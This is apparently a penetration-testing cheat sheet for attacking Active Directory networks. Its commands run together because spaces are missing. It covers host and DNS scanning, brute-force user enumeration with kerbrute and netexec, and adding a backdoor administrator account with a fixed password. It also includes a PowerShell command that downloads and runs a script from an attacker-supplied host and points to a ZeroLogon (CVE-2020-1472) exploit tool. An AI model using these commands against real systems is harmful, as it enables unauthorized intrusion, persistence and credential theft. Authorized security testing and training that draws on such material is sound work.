They are usually DNS Servers. They have usually LDAP listening port 389.
# with nmapnmap-p53,88,389 $network_ip --open-v-oNdc# with nmclinmclidevshow $iface# with nslookupnslookup-type=SRV_ldap._tcp.dc.msdcs.$domain
Enumerate alive machines
# with zmapsudozmap-i $iface -P2--probe-module=icmp_echoscan-B1M--max-targets=10000000-otargets_rfc1918.txt $network_ips# with arp-scanarp-scan-d $networkrange# with nxc - smb, ssh, rdpnxcsmb $networkrange
Enumerate services
DNS
# test for dns attacksdnsenum $domain -f/usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt--dnsserver $dns_server_ip >dnsenum.txt# discover printers, web, shares, vpn, mediagobusterdns-d $domain -t25-w/opt/Seclist/Discovery/DNS/subdomain-top2000.txt
Users Enumeration
# LINUX HOST# no auth# netexecnxcsmb $ip -uanonymous-p""--rid-brute10000# kerbrutekerbrute-domain $domain -dc-ip $ip -users/tools/payloads/SecLists/Usernames/xato-net-10-million-usernames.txt
# WINDOWS HOSTGetADUsers.py $domain/-dc-ip $ip# Get all of the OUs in a domainGet-ADOrganizationalUnit-Filter 'Name -like "*"'|Format-Table Name, DistinguishedName -A### Create a new user in admin groupe # username:password = anon:p3nT3st!net user anon p3nT3st!/addnet localgroup administrators anon /addnet user anon p3nT3st!/add;net localgroup administrators anon /addIf you cannot import module start a webserver andIEX(New-Object Net.Webclient).downloadstring('http://<IP>/Powershell.ps1')
Automatic tools
AD Enum
ASREPRoasting
Kerberoasting
Dump AD as BloodHound JSON files
Searching GPOs in SYSVOL for cpassword and decrypting
Run without creds and attempt to gather for further enumeration during the run
Sample exploits included:
CVE-2020-1472
Install
pip3installActiveDirectoryEnumpython-made# query exploit for pocpython-made--exploitcve-2020-1472